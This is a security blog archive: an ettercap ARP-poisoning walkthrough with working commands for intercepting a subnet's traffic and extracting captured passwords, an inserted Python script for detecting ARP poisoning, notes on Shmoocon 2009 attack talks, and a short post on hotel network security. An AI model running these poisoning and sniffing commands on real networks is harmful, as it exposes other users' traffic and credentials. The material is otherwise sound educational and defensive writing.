
28 February, 2011

Using ettercap for ARP poisoning

Ettercap is certainly nothing new, and there is plenty of documentation around to see how to use it, but I was sitting here goofing around and decided to record my results. I am not advocating this type of thing on a public network, and ARP poisoning or other attacks often fall afoul of terms of service for public and private networks, and may even be illegal in some jurisdictions.

First, I looked at my default route.

$ route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
10.71.0.0       0.0.0.0         255.255.255.0   U     2      0        0 wlan0
0.0.0.0         10.71.0.1       0.0.0.0         UG    0      0        0 wlan0


To sniff the whole subnet, I'll want to do some ARP poisoning to send all traffic to/from the default route through my system.

$ sudo ettercap -i wlan0 -T -M arp:remote /10.71.0.1/ //

You can also use "// //" to designate ARP poisoning no matter what source and destination ettercap sees. The "-T" tells ettercap to use the text interface, which is still interactive. There is also a curses-based interface, "-C", and a GTK interface, "-G", though the GTK one has always seemed less reliable to me than the others. The curses interface is actually pretty nice.

Once you run the command, ettercap should enumerate hosts and you will start seeing a bunch of traffic information scrolling through your console. How do we know if it's actually working? If you see non-broadcast traffic destined for other hosts, it will be obvious and you will know you're successfully sniffing all the traffic.

Another fun way is by opening etherape to see a realtime visualization of the traffic. If you are seeing typical non-broadcast traffic like HTTP, HTTPS, that's an indicator that you're successfully ARP poisoning. You can also get a quick idea if there are particular hosts getting a lot of traffic activity. I've seen the typical sites like Facebook, Amazon, Akamai, and LLNW, but also more interesting sites that are easily identifiable as VPN concentrators, banks, and more.

You can also, of course, use various tools, including ettercap with the "-w" option, to write traffic to a file and review it at your leisure to look for interesting data. Ettercap also has an interesting option to automatically grab usernames and passwords. From the man page:

       -L, --log
              Log  all  the packets to binary files. These files can be parsed
              by etterlog(8) to extract human readable data. With this option,
              all  packets  sniffed  by ettercap will be logged, together with
              all the passive info (host info + user & pass) it  can  collect.
              Given  a LOGFILE, ettercap will create LOGFILE.ecp (for packets)
              and LOGFILE.eci (for the infos).


If you didn't run this with ettercap originally, you can also run it on a saved packet capture.

$ ettercap -r hotel.raw -L hotel

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Please select an User Interface

$ ls hotel*
hotel.eci  hotel.ecp  hotel.raw

$ etterlog -a hotel.eci

etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Log file version    : NG-0.7.3
Timestamp           : Wed Feb 16 14:20:57 2010
Type                : LOG_INFO

Number of hosts (total)       : 248

Number of local hosts         : 30
Number of non local hosts     : 0
Number of gateway             : 0

Number of discovered services : 240
Number of accounts captured   : 4

$ etterlog -p hotel.eci

74.125.93.191   TCP 80     USER: fakeuser      PASS: fakepasswd

I changed the data above, and of course most sites these days are hopefully forcing encrypted logins.

These days, many sites can be hosted on one IP or virtual server. If you're not catching the DNS or HTTP request specifically before the login that was captured, the easiest way to determine which site on a specific IP was being visited would be opening up the packet capture with a tool like Wireshark, using a filter for the IP, then looking at the actual web traffic for the site's name. Looking in Wireshark, I can see the GET immediately after the TCP handshake.

GET /members/bbs/showthread.php HTTP/1.1
Host: www.fakedomain.com

This really just scratches the surface of what you can do with ettercap and other network tools. ARP poisoning still works, particularly on public networks, and many people log in to many services that can be easily compromised through sniffing (I write while sitting in an airport on public WiFi logged into my blogger account). A relatively recent high profile example was when the Metasploit site was briefly hijacked by successful ARP poisoning.

There are numerous other attacks besides sniffing that could succeed when ARP poisoning, many involving redirecting traffic or injecting malicious content. For instance, you can use something like sslstrip to redirect all HTTPS traffic to HTTP, grabbing credentials in the process. You could also inject content directly using etterfilter.

 DESCRIPTION
       The etterfilter utility is used to compile  source  filter  files  into
       binary  filter  files that can be interpreted by the JIT interpreter in
       the ettercap(8) filter engine. You have to compile your filter  scripts
       in  order  to  use  them  in  ettercap. All syntax/parse errors will be
       checked at compile time, so you will  be  sure  to  produce  a  correct
              binary filter for ettercap.

Using etterfilter you can inject new packets, replace data in packets, and more. If someone is visiting what they consider a known safe site, replacing data or injecting malicious packets can be quite successful. At a previous job, we had a non-production network for attack and defend fun, and with etterfilter I was able to replace all image requests by one of my colleagues' browser and instead have it request the image to the left.

Although my example above is obviously on a wireless network as shown by using the wlan0 interface, you can easily perform ARP poisoning on a local wired segment. There are also a number of ways to help detect or prevent poisoning with your network appliances or software.
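One cheap form of the detection mentioned above, as an added example that is not from the original post: a Python check that compares `arp -an` snapshots against a trusted baseline and flags the two cache symptoms a poisoning run leaves behind. The gateway 10.71.0.1 and the wlan0 interface come from the post; all MAC addresses and both snapshots are constructed.

```python
"""Spot the ARP-cache symptoms of an ettercap-style poisoning run.

Reads snapshots in the format printed by `arp -an` (net-tools, like the
`route -n` used above) and compares them with a baseline taken while the
network was trusted. Two symptoms are flagged: an IP whose MAC no longer
matches the baseline (worst when it is the gateway), and one MAC that now
answers for several IPs, which is what a victim's cache looks like while a
poisoner sits between it and the gateway. All addresses are constructed.
"""
import re
from collections import defaultdict

ARP_LINE = re.compile(
    r"^\?\s+\((?P<ip>\d+\.\d+\.\d+\.\d+)\)\s+at\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2}|<incomplete>)"
    r"\s+.*\bon\s+(?P<iface>\S+)",
    re.IGNORECASE,
)

def parse_arp_an(text, iface="wlan0"):
    """Return {ip: mac} for the complete entries seen on `iface`."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line.strip())
        if m and m["iface"] == iface and m["mac"] != "<incomplete>":
            table[m["ip"]] = m["mac"].lower()
    return table

def arp_alerts(baseline, current, gateway):
    """Compare one snapshot with the baseline; return (kind, detail) tuples."""
    alerts = []
    for ip, mac in current.items():
        known = baseline.get(ip)
        if known and known != mac:
            kind = "GATEWAY_MAC_CHANGED" if ip == gateway else "MAC_CHANGED"
            alerts.append((kind, f"{ip}: {known} -> {mac}"))
    owners = defaultdict(set)
    for ip, mac in current.items():
        owners[mac].add(ip)
    for mac, ips in owners.items():
        # A router may legitimately own several IPs on one MAC, so only
        # flag a MAC that was not already multi-homed in the baseline.
        base_ips = {i for i, m in baseline.items() if m == mac}
        if len(ips) > 1 and len(base_ips) <= 1:
            alerts.append(("ONE_MAC_MANY_IPS", f"{mac}: {sorted(ips)}"))
    return alerts

# Constructed `arp -an` output for the 10.71.0.0/24 network in the post,
# taken while the network was quiet...
BASELINE_SNAPSHOT = """\
? (10.71.0.1) at 02:00:0a:47:00:01 [ether] on wlan0
? (10.71.0.23) at 02:00:0a:47:00:17 [ether] on wlan0
? (10.71.0.42) at 02:00:0a:47:00:2a [ether] on wlan0
"""
# ...and later, while 10.71.0.42 is poisoning: the gateway and a peer both
# appear to live at 02:00:0a:47:00:2a, and an unanswered probe is incomplete.
POISONED_SNAPSHOT = """\
? (10.71.0.1) at 02:00:0a:47:00:2a [ether] on wlan0
? (10.71.0.23) at 02:00:0a:47:00:2a [ether] on wlan0
? (10.71.0.42) at 02:00:0a:47:00:2a [ether] on wlan0
? (10.71.0.99) at <incomplete> on wlan0
"""

def check_snapshot(baseline_text, current_text, gateway="10.71.0.1"):
    """Parse both snapshots and return the alerts for the current one."""
    return arp_alerts(parse_arp_an(baseline_text), parse_arp_an(current_text), gateway)

if __name__ == "__main__":
    for kind, detail in check_snapshot(BASELINE_SNAPSHOT, POISONED_SNAPSHOT):
        print(f"{kind:20s} {detail}")
```

Run it from cron against a baseline you saved on a known-good day; a GATEWAY_MAC_CHANGED alert is the one worth paging on.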

Finally, ettercap also has a number of interesting plugins available.

$ ettercap -P list

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA


Available plugins :

         arp_cop  1.1  Report suspicious ARP activity
         autoadd  1.2  Automatically add new victims in the target range
      chk_poison  1.1  Check if the poisoning had success
       dns_spoof  1.1  Sends spoofed dns replies
      dos_attack  1.0  Run a d.o.s. attack against an IP address
           dummy  3.0  A plugin template (for developers)
       find_conn  1.0  Search connections on a switched LAN
   find_ettercap  2.0  Try to find ettercap activity
         find_ip  1.0  Search an unused IP address in the subnet
          finger  1.6  Fingerprint a remote host
   finger_submit  1.0  Submit a fingerprint to ettercap's website
       gre_relay  1.0  Tunnel broker for redirected GRE tunnels
     gw_discover  1.0  Try to find the LAN gateway
         isolate  1.0  Isolate an host from the lan
       link_type  1.0  Check the link type (hub/switch)
    pptp_chapms1  1.0  PPTP: Forces chapms-v1 from chapms-v2
      pptp_clear  1.0  PPTP: Tries to force cleartext tunnel
        pptp_pap  1.0  PPTP: Forces PAP authentication
      pptp_reneg  1.0  PPTP: Forces tunnel re-negotiation
      rand_flood  1.0  Flood the LAN with random MAC addresses
  remote_browser  1.2  Sends visited URLs to the browser
       reply_arp  1.0  Simple arp responder
    repoison_arp  1.0  Repoison after broadcast ARP
   scan_poisoner  1.0  Actively search other poisoners
  search_promisc  1.2  Search promisc NICs in the LAN
       smb_clear  1.0  Tries to force SMB cleartext auth
        smb_down  1.0  Tries to force SMB to not use NTLM2 key auth
     stp_mangler  1.0  Become root of a switches spanning tree

08 February, 2009

Shmoocon 2009 Notes

I attended Shmoocon V over the weekend and had a good time as usual. There are always interesting people, the usual suspects, and some good talks. I think Shmoocon is still a great conference for the money. The bags given to attendees this year were by far the best of the four years I've been. There were some very good entries to the Barcode Shmarcode contest and I also saw some entertaining runs through the lockpick contest.

These notes do not include every time slot.

Friday

1500: Bruce Potter started the con with his opening remarks. He said that Shmoocon added around 500 tickets this year, bringing the total number of attendees above 1600. To have enough space, they had to add another room down the hall from the main area. The satellite room was out of sight of the main area, but not too difficult to find. Potter said that moving to the next larger space available instead of adding the one room would have been overkill and cost too much for the number of attendees.

One of the things I really like about Shmoocon is their involvement in charities. As usual, tshirt proceeds went to charities, in this case the buyer's choice between the EFF and Johnny Long's Hackers for Charity. Shmoocon also had a raffle with proceeds going to Covenant House, as did the proceeds from the Hacker Arcade. It is nice to see Bruce and other Shmoocon organizers promoting charity among their peers.

Potter often will make a small comparison between Shmoocon and other conferences, and this year he mentioned other conferences charging large amounts for training. Conversely, at Shmoocon if you want to learn something in a non-classroom environment, you can try to participate in Shmoocon Labs to help build a functional enterprise-like environment rather than just slapping together a simple wireless network. As an example, this year they had an open wireless network, a WPA-enabled wireless network, and a third using RADIUS. All attendees are welcome to walk through the room serving as their NOC and ask questions.

I really like The Shmoo Group's philosophy when it comes to running a conference. They try to be very transparent and take feedback, don't overcharge, and just generally want everyone to have a great time while still providing good technical content. It's a really attendee-friendly conference, right down to the 0wn the Con talk near the end.

Finally, Potter went on a rant about how security isn't working. Nothing to see here, move along. ;)

1600: The first technical talk I heard was Matt Davis and Ethan O'Toole presenting Open Vulture - Scavenging the Friendly Skies Open Source UAV Platform. Open Vulture is a software application and library designed to control unmanned vehicles. It was a neat talk though not a topic I know much about. Some of the possible uses for this would be controlling an unmanned vehicle to sniff wireless networks or take photos. They even have a GPS navigation module.

Saturday

Saturday is always the meat of the conference since it is the only full day and most people haven't been there long enough for the late nights to catch up to them.

1000: I enjoyed Matt Neely's presentation, Radio Reconnaissance in Penetration Testing. Matt had a lot of practical advice for radio reconnaissance, including recommending some relatively inexpensive hand-held scanners, the AOR 8200, Uniden Bearcat BCD396T, and the Uniden Bearcat SC230, which also happens to be a good choice for NASCAR. He pointed out what features to look for in scanners, for example channel memory.

His anecdotes from penetration tests included sniffing wireless headsets from blocks away, even when the phone is hung up. Apparently, many wireless headsets transmit constantly even if on the cradle, effectively functioning like a bug for eavesdropping. He has also used video converters when sniffing video.

When testing a client's casino, he visually scouted the location to help identify their hand-held radios, and then was able to get information from casino security through their radio communications, including their radio link to the police. He got a ton of information useful for social engineering and more, like guard names, the dispatcher's name, times of shift changes, and the lingo used by the guards.

At another client site, he noticed people using wireless headsets and got those added to the rules of engagement. Once they were added, he was able to eavesdrop on calls to the help desk for password resets, people calling their voicemail, and found that the headsets would keep transmitting even when the phone was hung up. Matt was able to get passwords, voicemail passwords, and assorted Personally Identifiable Information (PII) that was sensitive or could be used for social engineering. Rules of engagement and adhering to applicable laws are very important if you don't want to end up in jail after eavesdropping on voice communications.

I also talked to Neely the next day regarding learning about RF for a personal project I am interested in. He was very helpful and nice, just like most Shmoocon presenters I've ever spoken with. Hopefully, I will have time to start learning more about RF and playing around with it for a "fun" project.

1100: Next, I attended Fail 2.0: Further Musings on Attacking Social Networks presented by Nathan Hamiel and Shawn Moyer. Their talk was fun and definitely relevant. Their main focus was that "social engineering + vulnerabilities in social networks = ROI". They pointed out a number of ways to manipulate various social networking sites, including malicious code like IMG to CSRF, CSS javascript hijacking, and request forgeries (POST to GET).

One good anecdote was getting permission from Marcus Ranum to make a phony profile in his name and then using it to socially engineer others, particularly security professionals, on a social networking site. They actually got Ranum's sister to attempt to contact them through the phony profile.

Hamiel and Moyer demonstrated technical tricks to force someone to "friend" you and also posting a comment with code that will force the user to log out, effectively denial-of-servicing the person off his or her own profile. They also told anecdotes about posing as a recruiter, joining groups on LinkedIn so they could more easily build up a lot of connections, then looking for candidates with government security clearances and getting many responses to their inquiries.

1400: I skipped the 1200 talks to have a long lunch with some friends, then attended Jay Beale's Man in the Middling Everything with the Middler. The talk had a very slow start because of audience interaction, particularly involving Shmooballs and launchers.

Jay Beale's Middler is a tool to help leverage man-in-the-middle attacks, including injecting javascript, temporary or permanent redirects, session hijacking, and more. It seems like a neat tool and was released to the public at his talk. Jay pointed out some dangers of mixed HTTP and HTTPS sites and their vulnerabilities to things like injected javascript, stored session keys, intercepted logout requests, and replacing HTTPS links in proxied pages with HTTP links. Although the Middler has some specific support right now for attacking social networking sites and wide area sites like Google/GMail and live.com, it uses a plugin architecture so we should expect to see more plugins targeting specific sites.

1600: I had heard a good talk last year by Enno Rey and Daniel Mende, and combined with my focus on network security monitoring I definitely was interested in their presentation this year, Attacking backbone technologies. Their main focuses this year were BGP, MPLS, and Carrier Internet, one example of the latter being Carrier Ethernet. They were careful to point out that you really have to be part of the "old boys club" of trusted backbone providers to successfully use most of their attacks and that not just anyone would have enough access to core backbones to download their tools and use them for successful penetration testing or attacks.

For BGP, they mentioned that it is mostly manually configured, thus making it susceptible to simple mistakes like the famed AS7007 incident or the Youtube/Pakistan blocking incident. Rey and Mende also did a live demonstration using their "bgp_cli" tool to inject routes, and demonstrated how a single MD5-signed BGP packet can be used for cracking, rather than brute forcing directly against a router that limits the number of attempts per second.

Multiprotocol Label Switching (MPLS) is deployed on carrier backbones and relies on a trusted-core assumption, since attacks from outside the core are not possible. Rey and Mende demonstrated their "mpls_redirect" tool to modify MPLS Layer 3 VPN labels and redirect traffic. This is possible in part because of trusting carrier insiders and can be used to send traffic to different customer networks. Rey had a great line where he called it "branching" the traffic because he was told, due to his thick German accent, he should not use the word "forked" (or "fokt" as it sounded when he said it).

These two definitely are in a position to test the security of major providers from an insider perspective, which is not the norm, and they do a good job explaining some of the issues they find.

1700: David Kennedy's Fast-Track Suite: Advanced Penetration Techniques Made Easy was probably the most crowded presentation I attended. One suggestion I have for getting a good seat at Shmoocon is to plan your schedule ahead and note the presentations that are likely to be crowded. If you are not changing rooms, do not get up and lose your seat, because rooms definitely end up standing room only sometimes.

Kennedy was a good presenter. When you have fun on the podium, it definitely shows and keeps everyone attentive. He had a lot of audience participation as he showed a slide and said "Let's Pop a Box" each time before he used Fast-Track to own a system. When he started to forget "Let's Pop a Box," someone from the audience would invariably ask him if he forgot something or shout "Pop a Box!" as Kennedy did a face-palm.

Fast-Track itself is obviously pretty neat. He showed a variety of automated attacks against different targets that most often ended with a reverse shell back or reverse VNC back to his attacking system. He also talked about his evasion technique using Windows debug to download his stager, which is actually just a version of Windows debug without the 64k size limit.

Fast-Track 4.0 includes some new features like logging and payload conversion so you can load your own payloads to deliver. Although Fast-Track has a smaller list of exploits than Metasploit, Kennedy said that he strives to make them available across as many OS versions as possible. Version 4.0 also includes a mass client attack using ARP poisoning combined with emailed links to targets. The malicious page will display a generic "loading please wait..." message as it launches a multitude of attacks, but Kennedy said that 4.1 will also include browser profiling for more targeted exploits. One really nice feature is the auto-update to update a multitude of tools included in Fast-Track. Although I didn't look into it yet, I did wonder if it had any SNMP attacks and I think an SNMP auto-own attack would be a neat and not too complicated addition if it's not there yet.

Sunday

1000: I really feel for anyone in this time slot. After a weekend of hacking and partying, the number of people in any room is much smaller than the number of people at 1000 on Saturday. The numbers increase as people drag themselves into the talks through the hour.

I attended Re-Playing with (Blind) SQL Injection by Chema Alonso and Palako during this hour. I was starting to think I made the wrong choice because they started off slow and quite dry, but maybe they were included in the ones recovering from the previous night's festivities. By the second half, they started to have a little fun and had some funny moments, including a slide with, "Yes, we can!" Another funny moment was when they found a database username length of two and referred to it as "the most famous Microsoft SQL user..."

Although we've all probably seen or read about blind SQL injection before, they did have some interesting techniques and used their Marathon Tool to ease the tedious nature of blind SQL injection. One thing I liked was their method of using timing to separate a True answer page from a False answer page if there is no visible or code difference. Most SQL engines have slightly different supported methods to introduce time-based blind SQL injection so a response that is timed above a certain value can be considered true. Even those that don't include time-delay functions can be leveraged by running a "heavy" query only if a "light" query first returns as true. An example of a heavy query that would slow the response after a successful light query is multiple cross-table joins.

Alonso and Palako also did a good job answering questions. They definitely seemed more comfortable by the end of their presentation.

1100: Chris Paget is a very entertaining presenter and clearly had fun showing off his RFID reader during EDL Cloning for Under $250. He demonstrated how easy it is to read, clone, and write RFID cards created as part of the Western Hemisphere Travel Initiative. By design, these cards are supposed to be readable from 30 feet but it is trivial to read them at more than 200 feet and much longer distances, possibly around half a mile, should be possible. The cards also have no encryption or authentication.

Paget was able to buy an enterprise-level card reader by Motorola on eBay. Although he needed to perform some repairs on the RFID reader, the whole sniffing setup was only around $250. The card reader has no real security mechanisms for logon and listens on port 3000.

There are no federal anti-skimming laws to prevent RFID skimming/sniffing, though CA and WA states do have laws. Paget was able to grab a lot of information through war driving with his setup and pointed out that correlation means the cards can provide more than just an anonymous number. For instance, if you detect the same card tag twice you could compare it to photos to see whose face you saw twice. You could also correlate against other data like credit cards containing RFID to figure out which data belonged to which person.

Eventually as RFID cards become more common, this could present more serious issues like collecting tons of RFID card data until you get one where the person's appearance is close enough that you could use his identity, or terrorists could use it to identify targets in a crowd.

Paget stated that the supposed purpose for the cards was to enhance security, which clearly is a failure, and also to speed border crossings, which also has been a failure since users still have to present their cards directly. Paget believes that WHTI is broken but that RealID could be an alternative if it was revamped to fix all the serious problems. Ideally, among other recommendations, he advocates a contact smartcard rather than one that can be read remotely.

Another Shmoocon in the books. Thanks to the Shmoo Group, speakers and attendees for a good time.

12 September, 2008

Grass is green, sky is blue, news at 11

Study: Hotel Networks Put Corporate Users at Risk. You think?

Is it any surprise that most hotels use unencrypted or weak encryption for wireless? Is it any surprise that a substantial number still use hubs instead of switched networks?

It would surprise me more if hotels consistently worried about security for their guests' networks. If only 21 percent of hotels had reports of "wrongdoing" on their guest networks, that means the percentage of guests that report attacks is actually much lower. There is little financial incentive for the hotels to upgrade hardware and configure networks to prevent malicious activity. Most road warriors are more worried about convenience than security.

I bet encryption on hotel wireless networks causes more complaints than unencrypted wireless.